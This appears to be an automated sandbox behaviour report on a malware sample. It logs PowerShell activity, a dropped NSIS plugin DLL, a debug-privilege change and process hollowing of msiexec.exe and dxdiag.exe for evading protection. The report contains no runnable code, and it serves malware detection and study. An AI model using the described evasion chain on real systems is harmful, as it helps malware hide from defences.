Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9900Jump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeAPI call chain: ExitProcess graph end nodegraph_0-3687
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
